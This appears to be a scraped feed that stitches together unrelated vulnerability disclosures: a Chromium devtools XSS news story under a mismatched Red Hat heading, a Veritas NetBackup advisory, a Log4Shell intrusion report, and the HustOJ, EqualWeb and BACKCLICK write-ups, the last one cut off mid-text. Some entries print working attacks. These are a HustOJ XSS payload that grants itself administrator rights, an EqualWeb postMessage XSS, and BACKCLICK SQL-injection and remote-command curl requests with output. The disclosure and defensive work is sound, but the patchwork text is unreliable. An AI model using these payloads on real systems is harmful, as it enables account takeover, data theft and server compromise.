Red Hat Security Advisory 2022-8506-01 - Red Hat Satellite is a systems management tool for Linux-based infrastructure. It allows for provisioning, remote management, and monitoring of multiple Linux deployments with a single centralized tool. Issues addressed include code execution, cross site scripting, denial of service, remote SQL injection, and traversal vulnerabilities.

Red Hat Security Advisory 2022-8506-01

A case study on the complexity of browser security

A case study on the complexity of browser security

  

Malicious actors can stage cross-site scripting (XSS) attacks across the subdomains of a website if they can trick users of Chromium browsers into entering a simple JavaScript command in the developer console.

This is according to the findings of security researcher Michał Bentkowski who presented his findings in a blog post published yesterday (November 16) titled Google Roulette.

While the bug is hard to exploit and Google has decided not to patch it, it is an interesting case study on the complexities of browser security.

**Same-origin policy, site isolation**

Chromium browsers have several safeguards to prevent XSS attacks. The Same-Origin policy feature prevents scripts in one browser tab from accessing cookies and data from another domain.

The Site Isolation feature, on the other hand, gives a separate process to each domain to prevent different websites from accessing each other’s memory space in the browser.

However, it is worth noting that Same-Origin and Site Isolation do not apply to subdomains.

Therefore, two browser tabs that are on, say, https://workspace.google.com and https://developer.google.com will run on the same process and are considered to be of the same origin (google.com).

**Developer console scripts**

The browser’s protection mechanisms apply not only to on-page scripts but also to scripts running in the browser’s developer console. However, the developer console has access to certain extra functions that are not available to on-page scripts.

One of these functions is , which sets breakpoints on specific events, such as when a function is called.

Two things are interesting about . First, it has an optional argument that allows you to replace the breakpoint functionality with a custom JavaScript code. And second, when you use the developer console to define a event on a webpage, it persists across page refreshes and even carries to other subdomains of the same origin in the same tab.

DON’T MISS CSRF in Plesk API enabled server takeover

How does lead to XSS? First, Bentkowski set up a page that contained two malicious functions.

The first one is the XSS payload, which iterates across the subdomains of the current origin and runs a proof-of-concept script (in this case an popup).

The second one is a getter function called that defines a event for the function (which happens many times during a page load) and reloads the page.

Since needs to be explicitly called from the developer console, the page displays a message that prompts the user to call from the developer console. After that, the XSS cycle is triggered and goes through any number of subdomains defined in the payload function.

A video containing a proof-of-concept can be found here.

**Impact and fix**

“I see it more as an interesting technical bug than something exploitable in the real world,” Bentkowski told The Daily Swig. “In my opinion, the user interaction required by this attack makes it not really feasible for attackers.”

There are, however, two scenarios where this bug can become concerning, according to Bentkowski.

First are websites where users can create their own subdomains. In this case, a user can create a malicious page and trick visitors into triggering the XSS function on their own subdomain.

Read more of the latest browser security news

A second scenario is when there is an XSS vulnerability on one subdomain and the attacker wants to escalate it to others through the developer console.

Bentkowski reported the bug in 2020 and Google has apparently decided not to fix it. “The issue isn’t currently assigned to anyone so it doesn’t look like we can expect the patch soon,” Bentkowski said.

However, Google agreed to allow Bentkowski to make his findings public, telling him that since the bug is no longer exploitable via Chrome Extensions, it is no longer a security issue.

“I still think that there might be some ways to escalate it that I failed to discover, and maybe you, my dear readers, will have some better ideas,” Bentkowski wrote on his blog.

YOU MIGHT ALSO LIKE Mastodon users vulnerable to password-stealing attacks

Google Roulette: Developer console trick can trigger XSS in Chromium browsers

The Java Admin Console in Veritas NetBackup through 10.1 and related Veritas products on Linux and UNIX allows authenticated non-root users (that have been explicitly added to the auth.conf file) to execute arbitrary commands as root.

**Revision History**

*   November 15, 2022 – Initial Public Release

**Summary**

Veritas has addressed an OS Command Injection vulnerability affecting the NetBackup Java Admin Console. Please see the “Notes” section below to determine if you are vulnerable to this issue. Only users explicitly added to the auth.conf file can exploit this vulnerability.

**Issues****OS Command Injection vulnerability**

A vulnerability in the NetBackup Java Admin Console allows authenticated non-root users that have been explicitly added to the auth.conf file to execute arbitrary commands as root.

*   CVE ID: TBA
*   Severity: High
*   CVSS v3.1 Base Score: 7.5 AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
*   Potentially impacted components: Primary servers, Media servers, and Clients. (See Notes below).
*   Recommended action:
    *   NetBackup: Upgrade to 8.2, 8.3.0.1, 8.3.0.2, 9.0.0.1, 9.1.0.1, 10.0.0.1 or 10.1 and apply corresponding Hotfix
    *   NetBackup Appliance: Upgrade to 3.2, 3.3.0.1, 3.3.0.2, 4.0.0.1, 4.1.0.1 or 5.0.0.1 MR1 and apply appropriate Hotfix.
    *   Flex Appliance: Please apply the NetBackup Hotfix corresponding to the NetBackup Container version on Flex appliances.
    *   Flex Scale: Please contact Veritas Technical Support and reference Knowledge Article ID 100053006 to obtain a fix.

**Notes**

The /usr/openv/java/auth.conf file grants access to functions in the NetBackup Administration Console. This file is created by default with only root having administrative rights. This file is present on Primary Servers, Media Servers and Clients.

Unless auth.conf is modified by adding non-root users to it and allowing those users to manage Primary servers or Media servers or Clients, the environment is NOT vulnerable, and the fix is not required.

This affects only Unix-based servers and clients. Windows-based servers and clients are unaffected.

The fix updates the vulnerable bpjava binary on the target system that the Java Admin UI console connects to.

For more details about auth.conf please see: https://www.veritas.com/content/support/en\_US/doc/21733320-149123528-0/v41641695-149123528

**Questions**

For questions or problems regarding this advisory please contact Veritas Technical Support (https://www.veritas.com/support)

**Acknowledgement**

Veritas would like to thank the Nordea Backup Team for reporting the issue to us.

**Disclaimer**

THE SECURITY ADVISORY IS PROVIDED "AS IS" AND ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY IMPLIED WARRANTY OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE OR NON-INFRINGEMENT, ARE DISCLAIMED, EXCEPT TO THE EXTENT THAT SUCH DISCLAIMERS ARE HELD TO BE LEGALLY INVALID. VERITAS TECHNOLOGIES LLC SHALL NOT BE LIABLE FOR INCIDENTAL OR CONSEQUENTIAL DAMAGES IN CONNECTION WITH THE FURNISHING, PERFORMANCE, OR USE OF THIS DOCUMENTATION. THE INFORMATION CONTAINED IN THIS DOCUMENTATION IS SUBJECT TO CHANGE WITHOUT NOTICE. ANY FORWARD-LOOKING INDICATION OF PLANS FOR PRODUCTS IS PRELIMINARY AND ALL FUTURE RELEASE DATES ARE TENTATIVE AND ARE SUBJECT TO CHANGE. ANY FUTURE RELEASE OF THE PRODUCT OR PLANNED MODIFICATIONS TO PRODUCT CAPABILITY, FUNCTIONALITY, OR FEATURE ARE SUBJECT TO ONGOING EVALUATION BY VERITAS, AND MAY NOT BE IMPLEMENTED AND SHOULD NOT BE CONSIDERED FIRM COMMITMENTS BY VERITAS AND SHOULD NOT BE RELIED UPON IN MAKING DECISIONS.

Veritas Technologies LLC  
2625 Augustine Drive  
Santa Clara, CA 95054

CVE-2022-45461: Hotfix for Security Advisory Impacting NetBackup Java Admin Console

Iranian government-sponsored threat actors have been blamed for compromising a U.S. federal agency by taking advantage of the Log4Shell vulnerability in an unpatched VMware Horizon server.
The details, which were shared by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), come in response to incident response efforts undertaken by the authority from mid-June through mid-July 2022

Iranian government-sponsored threat actors have been blamed for compromising a U.S. federal agency by taking advantage of the Log4Shell vulnerability in an unpatched VMware Horizon server.

The details, which were shared by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), come in response to incident response efforts undertaken by the authority from mid-June through mid-July 2022.

"Cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, moved laterally to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence," CISA noted.

LogShell, aka CVE-2021-44228, is a critical remote code execution flaw in the widely-used Apache Log4j Java-based logging library. It was addressed by the open source project maintainers in December 2021.

The latest development marks the continued abuse of the Log4j vulnerabilities in VMware Horizon servers by Iranian state-sponsored groups since the start of the year. CISA did not attribute the event to a particular hacking group.

However, a joint advisory released by Australia, Canada, the U.K., and the U.S. in September 2022 pointed fingers at Iran's Islamic Revolutionary Guard Corps (IRGC) for leveraging the shortcomings of post-exploitation activities.

The affected organization, per CISA, is believed to have been breached as early as February 2022 by weaponizing the vulnerability to add a new exclusion rule to Windows Defender that allowlisted the entire C:\\ drive.

Doing so made it possible for the adversary to download a PowerShell script without triggering any antivirus scans, which, in turn, retrieved the XMRig cryptocurrency mining software hosted on a remote server in the form of a ZIP archive file.

The initial access further afforded the actors to fetch additional files such as PsExec, Mimikatz, and Ngrok, in addition to using RDP for lateral movement and disabling Windows Defender on the endpoints.

"The threat actors also changed the password for the local administrator account on several hosts as a backup should the rogue domain administrator account get detected and terminated," CISA noted.

Also detected was an unsuccessful attempt at dumping the Local Security Authority Subsystem Service (LSASS) process using the Windows Task Manager, which was blocked by the antivirus solution deployed in the IT environment.

Microsoft, in a report last month, revealed that cybercriminals are targeting credentials in the LSASS process owing to the fact that it "can store not only a current user's OS credentials but also a domain admin's."

"Dumping LSASS credentials is important for attackers because if they successfully dump domain passwords, they can, for example, then use legitimate tools such as PsExec or Windows Management Instrumentation (WMI) to move laterally across the network," the tech giant said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Iranian Hackers Compromised a U.S. Federal Agency’s Network Using Log4Shell Exploit

A stored XSS vulnerability was discovered in adminweb/ra/viewendentity.jsp in PrimeKey EJBCA through 7.9.0.2. A low-privilege user can store JavaScript in order to exploit a higher-privilege user.

Loading

×Sorry to interrupt

CSS Error

Refresh

CVE-2022-39834: Keyfactor Support

Hustoj 22.09.22 has a XSS Vulnerability in /admin/problem_judge.php.

**描述问题**  
XSS Vulnerability exists in  

echo $row\['input\_text'\]."\\n";

  
**如何复现**  
Steps to reproduce the behavior:

1.  POST text with xss script to submit.php  
    for example:

id=-1000&language=1&source=asdasdasdasdasd&input\_text=<script src\="/template/bs3/jquery.min.js"\></script\><script\>$.get("/admin/privilege\_add.php").done(function(data){
    re\=/name="postkey" value="(\[\\w\]%2B?)"/g;
    $.post("/admin/privilege\_add.php",{"postkey":re.exec(data)\[1\],"user\_id":"username","rightstr":"administrator","valuestr":"true"
                                  ,"do":"do","do":"do","csrf":"tV8EG8W5AsFY0JCKoBStoHC2v30NrDe5"}).done(function (data) {console.log(data)})
})
</script\>

Then you can get a sid.  

2.  Send malicious links to administrators  
    example:

<body\>
<script type\="text/javascript"\>
    function post(URL, PARAMS) {
    var temp \= document.createElement("form");
    temp.action \= URL;
    temp.method \= "post";
    temp.style.display \= "none";
    for (var x in PARAMS) {
        var opt \= document.createElement("textarea");
        opt.name \= x;
        opt.value \= PARAMS\[x\];
        temp.appendChild(opt);
    }
    document.body.appendChild(temp);
    temp.submit();
    return temp;
}
post("http://192.168.0.25:8080/admin/problem\_judge.php",{"sid":"1018","pid":"1000","result":"4","time":"500","memory":"1024","sim":"100","simid":"0","filename":"1000%2Ftest.in","gettestdatalist":"do","getcustominput":"1"})

</script\>
</body\>

CVE-2022-42187: XSS Vulnerability in /admin/problem_judge.php · Issue #866 · zhblue/hustoj

Dreamer CMS 4.0.01 is vulnerable to SQL Injection.

Java

1

https://gitee.com/isoftforce/dreamer\_cms.git

git@gitee.com:isoftforce/dreamer\_cms.git

isoftforce

dreamer\_cms

Dreamer CMS（梦想家CMS内容管理系统）

CVE-2022-42245: ArchivesMapper.xml has sql injection · Issue #I5U408 · 王俊南/Dreamer CMS（梦想家CMS内容管理系统） - Gitee.com

EqualWeb Accessibility Widget 2.0.0, 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.1.10, 3.0.0, 3.0.1, 3.0.2, 4.0.0, and 4.0.1 allows DOM XSS due to improper validation of message events to accessibility.js.

The Americans with Disabilities Act (ADA) includes requirements on companies falling within its scope to ensure their websites are accessible to individuals with disabilities. These requirements have created a strong incentive for companies to use third-party solutions in the form of JavaScript libraries to make their websites accessible. However, using third-party solutions comes with its own risks.

Recently, Imperva’s vulnerability research team uncovered a DOM XSS vulnerability in certain versions of a popular accessibility widget by EqualWeb. We would like to emphasize that we did not find this vulnerability in the latest version of EqualWeb’s accessibility widget and only found the vulnerability in older versions that are specified at the end of this post.

**Successful exploitation of this vulnerability could allow malicious actors to impersonate a user and take over a user’s account, perform any action on behalf of the user and or steal sensitive information such as cookies and session tokens.**

According to the EqualWeb website, the EqualWeb accessibility widget is being used by many popular companies and websites such as IronSource, Fiverr, Gett, Bosh, Playtika, Zara, YOT PO and AVIS, as well as financial institutions and public sector and nonprofit entities.

In this post, we will go over the vulnerability, explain how it was detected and what you can do to manage your third-party risks better.

****What is DOM-based XSS?****

DOM-based XSS vulnerabilities occur when JavaScript uses data from an attacker-controllable source, such as the URL or untrusted message event, and passes it to a method or an API that supports dynamic code execution, such as innerHTML or eval.

DOM-based XSS vulnerabilities are notoriously hard to detect and prevent because they involve the manipulation of the Document Object Model (DOM) rather than the source code of the application. The attacker’s input may not be reflected in the source code, and may only be triggered under certain externally-controllable circumstances, such as post-message events.

****Identifying the threat****

One of the most common recommendations regarding XSS prevention is to sanitize user input. With that said, some user inputs are harder to spot, which makes them the perfect place to hunt for vulnerabilities.

One of the most overlooked input sources is the browser post-message API.

The post-message API allows for cross-origin communication. This means that a malicious script on one domain can send messages to a script on another domain. These messages can be used to bypass restrictions that the browser has in place to prevent cross-origin communication.

If a website does not properly validate and sanitize messages that are received through the post-message API, it is sometimes possible for an attacker to inject malicious code into the website. This code can then be executed by the website, leading to a range of potential consequences, such as the theft of sensitive information or the execution of unwanted actions on behalf of the user.

****Understanding the post-message API****

To identify whether a website can be exploited using the post-message API, we need to understand how it works. The post-message API uses the browser’s “message” event. This event is fired when a message is received by a window or a frame. The message event has two properties that are relevant to us:

– **data**: The message that was sent

– **origin**: The origin of the message

To receive messages, the website needs to register an event listener for the message event, which looks something like this:

window.addEventListener('message', function(event) {
document.body.innerHTML = event.data;
});

Once the site registered the event listener, it will start receiving messages. These messages can be sent by other scripts on the same domain or by scripts on other domains. If we want to send a message, we can use the postMessage function. This function takes two arguments:

– **data**: The message that will be sent

– **targetOrigin**: The origin of the window or frame that will receive the message

The following code demonstrates how to send a message:

var target = window.open(“https://example.com”);
target.postMessage(“Hello”, “https://example.com”);

This message will result in the word “Hello” being written to the screen.

However, as you probably noticed, our event listener has 2 main security issues.

1.  We do not validate the message origin, which means any website can send messages to our event listener which could lead to some unintended consequences.
2.  We write unsanitized input to the website DOM by setting the document.body.innerHTML property.

****Exploring “message” event handlers on any site****

A quick way to find “message” event listeners on any website is to use the “getEventListeners” method from the devtools console; this method returns event listeners of the given object.

We can simply give it the window object, and look for “message” event listeners like so:

getEventListeners(window)
.message.map(e => e.listener)
.map(console.log);

The code above will go over each event listener and print it to the console, you can now click on each listener from the console to jump to the method definition.

****The vulnerability****

The EqualWeb widget registered a few “message” event listeners, none of which checks if a message was sent from an allowed source. This means any cross-origin site can send messages to those listeners.

While reading each message event listener, the following code was discovered.

window.addEventListener("message", function(i) {
       try {
           const n = e.a11y.GetMsgData(i.data);
           let s = document.querySelectorAll(\`iframe\[src\]:not(\[src^="javascript"\])\`);
           e.isIframe && !s || !n || "isNagichOnTop" !== n.INDmessage || t(s, "isNagichOnTop"),
           "getIndModes" === n.INDmessage && t(s, e.mode),
           (e.a11y.validMethods\[n.optName\] &&
               e.a11y.validMethods\[n.optName\] == n.method ||
               "INDactivate" === n.INDmessage ||
               "INDactivate" === n.command) && e.LoadData((function() {
                   var t = e\[n.method\];
                   "function" == typeof t && t(n.data ? n : n.optName)
               }
           ))
       } catch (e) {
           this.INDLog(e, "err")
       }
}

As you can see we have a lot of elaborate checks before reaching what seems to be an interesting piece of code. We started by checking if exploitation is even possible under the best-case scenario. So for now, we are ignoring all the other checks and just focusing on the highlighted section.

The variable “n” holds our message payload, and as you can see, it is used to access a property of the variable “e”, the code then checks that the property is a function and execute it with “n” or “n.optName” as the first argument which is also under our control.

This looks promising, but it all comes down to what methods are there in the “e” variable. Let’s take a look, we wrote this short script to only show the methods in the “e” variable that receives at least one argument.

for (let key in e){
   if (typeof e\[key\] !== "function"){ continue; }
   if (e\[key\].toString().indexOf('function()') === 0){ continue; }
   console.log(key,e\[key\]);
}

After doing that we had 83 methods to review, after going through about 20 we found the one. The _getBlock_ method.

e.getBlock = function(e) {
   let t = $IND(e).parents(".INDblock");
   return $IND(t\[t.length - 1\]).data("INDblock")
}

This method takes one argument “e” and passes it to $IND which turns out to be  jQuery, which is very helpful since jQuery selector evaluates HTML tags automatically leading to XSS.

Now that we know exploitation is possible, let’s check if we can reach the vulnerable code.

(e.a11y.validMethods\[n.optName\] &&
               e.a11y.validMethods\[n.optName\] == n.method ||
               "INDactivate" === n.INDmessage ||
               "INDactivate" === n.command)

The conditions above have to evaluate to true for the vulnerable code to be reached. At first glance it seems n.optName is checked against an allow list, optName is required for our exploit to work. However, when looking closer, the condition itself seems to ignore all of that  if _n.INDmessage_ or _n.command_ is equal to _“INDactivate”_.

Let’s test it. We pasted the following code in the devtools console, where a vulnerable version of the EqualWeb Javascript code is running.

postMessage(JSON.stringify({"command": "INDactivate", "method": "getBlock", "optName": "<img src='ftp:' onerror=alert(1) >"}))

A few seconds later an alert message appears. To make sure the attack is feasible, w We then confirm messages can be sent from a different domain.

****Third-party risk management****

As reflected above, companies should be aware of the risks associated with using third-party solutions.

Third-party risk management is the process of identifying, assessing, and mitigating risks associated with using third-party products and services.

As part of third-party risk management, companies should:  
– Identify all the third-party products and services they are using  
– Assess the risks associated with each third-party product and service  
– Mitigate the risks by implementing security controls  
– Continuously monitor the third-party products and services for risks

**Imperva’s Client-Side Protection** can help companies mitigate the risks associated with using third-party products and services by continuously monitoring all JavaScript services and only allowing pre-approved services to execute. This means that any new JavaScript services or changes are blocked until authorized, and if any JavaScript code is poisoned/exploited and attempts to send data elsewhere, your security team will be the first to know.

****Just-in-time widgets****

Almost all third-party libraries/widgets execute by default for all visitors; in some cases, this is necessary, for example when collecting analytics. However, it’s not clear why widgets for things like accessibility or chat have to be loaded for all visitors.

In general, most of your visitors would not use the chat/accessibility widgets while using the site. With a few lines of code, any developer can make it so that only once the user interacts with the floating chat/accessibility widget the library code will be executed.

It may be a bit slower for the site visitors who choose to use the widget, but from a security point of view, your site attack surface is greatly reduced. If we take the EqualWeb case as an example, sites that utilize this approach would render this attack almost useless since users would have to use the widget before the vulnerability could be exploited.

**We recommend that when possible, providers should implement this kind of architecture by default.**

****IOCs****

**Vulnerable EqualWeb Accessibility widget versions:**

*   2.0.0
*   2.0.1
*   2.0.2
*   2.0.3
*   2.0.4
*   2.1.10
*   3.0.0
*   3.0.1
*   3.0.2
*   4.0.0
*   4.0.1

Please note, while it is possible other versions of the widget include the DOM XSS vulnerability, those versions listed above were the only ones we confirmed to be vulnerable. Versions above 4.0.1 and the latest version seem to be unaffected.

**Hostnames:**  

*   aacdn.nagich.com
*   js.nagich.co.il
*   cdn.equalweb.com
*   cdn.uirix.com

**Try Imperva for Free**

Protect your business for 30 days on Imperva.

Start Now

CVE-2022-42960: New Vulnerability in Popular Widget Shows Risks of Third-Party Code | Imperva

An issue was discovered in BACKCLICK Professional 5.9.63. Due to insufficient escaping of user-supplied input, the application is vulnerable to SQL injection at various locations.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ﻿Advisory ID: SYSS-2022-029 Product: BACKCLICK Manufacturer: BACKCLICK GmbH Tested Version(s): BACKCLICK Professional 5.9.63 (On-Premises) Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') (CWE-89) Risk Level: High Solution Status: Unknown Manufacturer Notification: 2022-05-25 Public Disclosure: 2022-11-14 CVE Reference: CVE-2022-44003 Author of Advisory: Jannik Vieten, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: BACKCLICK is a web application used for e-mail marketing and the creation of newsletters. The German manufacturer describes the product as follows (see \[1\]): "BACKCLICK ist eine webbasierte Enterprise E-Mail Marketing Lösung und Newsletter Software, mit der Sie online E-Mail Kampagnen und Newsletter erstellen und an Ihre Kunden versenden können." Due to insufficient escaping of user-supplied input, the application is vulnerable to SQL injection at various locations. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: When SQL queries are constructed, user-controlled parameters are inserted in an insecure manner. Attackers can exploit this by injecting SQL syntax into parameters to influence the query executed by the database. This can be utilized to retrieve all data stored within the database. The vulnerability exists at various locations within the application. This indicates a structural or architectural problem of BACKCLICK's construction of SQL queries. Confer the "Proof of Concept" section below for exemplary incarnations of the issue. In order to prevent such vulnerabilities, user-controlled parameters must be considered potentially malicious. When constructing database queries, parameters need to be inserted securely in order to render injected SQL syntax harmless. The use of prepared statements with parameterized queries is a method that can be used to accomplish this (see \[4\]). ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The following examples show locations where SQL injection was possible. This list is not intended to be exhaustive. The search function within the management interface at "Abonnenten - Verwaltung" > "Test-Verteiler" can be exploited using the tool sqlmap (see \[5\]): sqlmap.py --cookie JSESSIONID=\[...session id...\] -u 'https://example.com/bc/servlet/gui.bc\_rob\_positiv?idx=1&action=1&min=0&PATTERN=\*&HPS=50' --dbms mysql --level 5 --risk 3 A similar vulnerability is also exploitable by unauthenticated remote attackers. Here, the payload for a UNION-based injection is within a base64-encoded URL parameter: curl -k -i 'https://example.com/bc/servlet/web.announcements?dHlwZT0wJm1pZD0wJmxheW91dD0xJmlkPWEnIEFORCAxPTAgVU5JT04gU0VMRUNUIChTRUxFQ1Qgc3Vic2NyaWJlcl9lbWFpbCBGUk9NIHN1YnNjcmliZXJzIExJTUlUIDEpLCAxIC0tICZwcmV2aWV3PTE;1;1;' This corresponds with the following UNION-based injection: type=0&mid=0&layout=1&id=a' AND 1=0 UNION SELECT (SELECT subscriber\_email FROM subscribers LIMIT 1), 1 -- &preview=1 The server's response contains the extracted data (here: an e-mail address) in the "Location" header of the HTTP response: HTTP/1.1 500 500 Date: Wed, 11 May 2022 13:46:11 GMT Server: Apache/2.4.41 (Ubuntu) Set-Cookie: JSESSIONID=...; Path=/bc; Secure; HttpOnly Location: jane.doe@example.org&bc1=1&bc2=1 Content-Length: 1181 Connection: close Content-Type: text/html;charset=UTF-8 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Contact vendor for solution. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-05-25: Vulnerabilities reported to manufacturer 2022-06-28: Advisories provided again, as originals were not received 2022-07-20: Confirmation, inquiry regarding reproduction of one issue 2022-11-14: No more information received, public disclosure of vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: \[1\] Product website for BACKCLICK https://www.backclick.de/ \[2\] SySS Security Advisory SYSS-2022-029 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-029.txt \[3\] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy \[4\] OWASP SQL Injection Prevention Cheat Sheet https://cheatsheetseries.owasp.org/cheatsheets/SQL\_Injection\_Prevention\_Cheat\_Sheet.html \[5\] Automatic SQL injection and database takeover tool https://github.com/sqlmapproject/sqlmap ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Jannik Vieten of SySS GmbH. E-Mail: jannik.vieten@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Jannik\_Vieten.asc Key ID: 0xC3366ECBE2C70C423ECFC123858221C952002FFB Key Fingerprint: C336 6ECB E2C7 0C42 3ECF C123 8582 21C9 5200 2FFB ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEwzZuy+LHDEI+z8EjhYIhyVIAL/sFAmNk1xQACgkQhYIhyVIA L/saYQ/+LM3NsGrRo+ohC5YmL4oRY+oLXas6gXpRV6ltKPhQK64ErCtXAFQric/C q/7t7fP1tzm1LJzRV3Xf9F1OvLiRlE6ItQZeU75uTdBF/JwUl/Hqm5baCZTcbuH8 oQFw2pAVxSbphrlW9OdeiTsr5P4jVcb3MUQWhBiUq7aofr/vrHIBuBU4iP1ehz6A +6aDAdTqNmDmRTBVOoLQYuMccel4EGvUgTeFvcNCjSWhhhuEB9MCmNEHXDrUl9yi gDHzHKtIurpt2FWabc2flblL8IRLAP7z6QG4/kMPTbfuK0YUOISfO++4+UHMOUQ2 92/AMbZESMe0O26rHbnXNdygVR/FMQRFINurMcuLbb0gJtEqJXnpFJGCZ9ByeFRJ syNrjpdgaV1JwqQuJR9MBM4Fgo8rseFSQQVIGVaVMZOXkzDrFBJZMgxxpqGWx8jL HMcnmhVTEdsz6qjAHNT+hJZ8WWwJksO4RPgtpPB6lF1suaWHn7ZWzN4dUKe7DErt 6fEXFSkf1t3H8vVJLSSihyJwxO+hyVOHVBKN6NZaO/NMTLMZ+mzJjGFsC7wujrEP SziBzPxvelWKfJVKLUsbWHVr66g8T73wUVfJwNkS8ExFqUQ5HWZCOOL0nTgESPL8 vaZxzWhcPnCc9oVq6I8TuurSDQ8w3Vh2UzK3SGx+Wh5CPJy5EaU= =/w+N -----END PGP SIGNATURE-----

CVE-2022-44003

An issue was discovered in BACKCLICK Professional 5.9.63. Due to an exposed internal communications interface, it is possible to execute arbitrary system commands on the server.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ﻿Advisory ID: SYSS-2022-032 Product: BACKCLICK Manufacturer: BACKCLICK GmbH Tested Version(s): BACKCLICK Professional 5.9.63 (On-Premises) Vulnerability Type: CWE-913: Improper Control of Dynamically-Managed Code Resources CWE-306: Missing Authentication for Critical Function Risk Level: High Solution Status: Unknown Manufacturer Notification: 2022-05-25 Public Disclosure: 2022-11-14 CVE Reference: CVE-2022-44000 Author of Advisory: Moritz Bechler, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: BACKCLICK is a web application used for e-mail marketing and the creation of newsletters. The German manufacturer describes the product as follows (see \[1\]): "BACKCLICK ist eine webbasierte Enterprise E-Mail Marketing Lösung und Newsletter Software, mit der Sie online E-Mail Kampagnen und Newsletter erstellen und an Ihre Kunden versenden können." Due to an exposed internal communications interface, it is possible to execute arbitrary system commands on the server. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: A part of the management application is implemented in PHP, which is run in separate FastCGI processes. A bridge facilitates communication between the PHP and Java code. The PHP to Java interface uses an HTTP protocol endpoint at /bc/\*.phpjavabridge which accepts an XML-based request format allowing low-level interaction with Java objects. That interface allows direct invocation of Java methods, e.g. java.lang.Runtime.getRuntime().exec(X), and thereby execution of system commands in the context of the application server. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): A suitable request can be constructed and submitted with curl: - ----- > curl -v -i -s -k -X $'PUT' --data-binary $'\\x7f{ ' $'https://externalhost/bc/servlet/servlet.phpjavabridge' \[...\] ls -la /tmp/systemd-private-\[...\]-tomcat9.service-EW826i/tmp/php-rce - -rw-r----- 1 tomcat tomcat 0 Mär 17 14:19 /tmp/systemd-private-\[...\]-tomcat9.service-EW826i/tmp/php-rce - ----- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Contact vendor for solution. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-05-25: Vulnerabilities reported to manufacturer 2022-06-28: Advisories provided again, as originals were not received 2022-07-20: Confirmation, inquiry regarding reproduction of one issue 2022-11-14: No more information received, public disclosure of vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: \[1\] Product website for BACKCLICK https://www.backclick.de/ \[2\] SySS Security Advisory SYSS-2022-032 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-032.txt \[3\] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Moritz Bechler of SySS GmbH. E-Mail: moritz.bechler@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz\_Bechler.asc Key ID: 0x768EFE2BB3E53DDA Key Fingerprint: 2C8F F101 9D77 BDE6 465E CCC2 768E FE2B B3E5 3DDA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest 